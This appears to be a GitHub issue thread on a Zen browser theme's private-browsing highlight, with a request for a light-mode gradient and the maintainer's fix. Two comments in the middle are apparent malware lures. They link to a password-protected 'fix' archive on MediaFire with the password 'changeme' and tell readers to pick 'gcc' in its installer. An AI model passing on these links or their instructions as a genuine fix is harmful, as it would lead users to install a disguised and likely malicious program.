### ISSUE TITLE
Add alternate gradient version for light mode

### ISSUE THREAD

**Issue by KiKaraage** [danm36/zen-browser-private-browsing-toolbar-highlighting#1]
Current purple gradient only blends well with dark themes. I hope you can consider alternative shade of the purple color (or the bottom  side of the gradient?) to make it compatible visually with light mode themes (Light and Zen Dream)

![image](https://github.com/user-attachments/assets/82555847-4128-4410-a594-fb713803ef88)

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by benstone326** [comment]
And the icon is hidden behind the URLbar, if you have stretched URLbar.

![image](https://github.com/user-attachments/assets/18ff7ff0-dc70-4120-843e-6d0c272ceb20)

**Comment by danm36** [comment]
A more pleasant purple has been added for light mode and icon overlapping has been prevented. A PR has been raised with the Zen theme store - https://github.com/zen-browser/theme-store/pull/223

**Comment by danm36** [comment]
This has just been merged in, and updating your themes from the Look and Feel settings should add the light mode variations as well as a togglable border around the web page frame.

If updating doesn't work now, then it should do in a few hours when the updated themes are added to the Zen themes page.
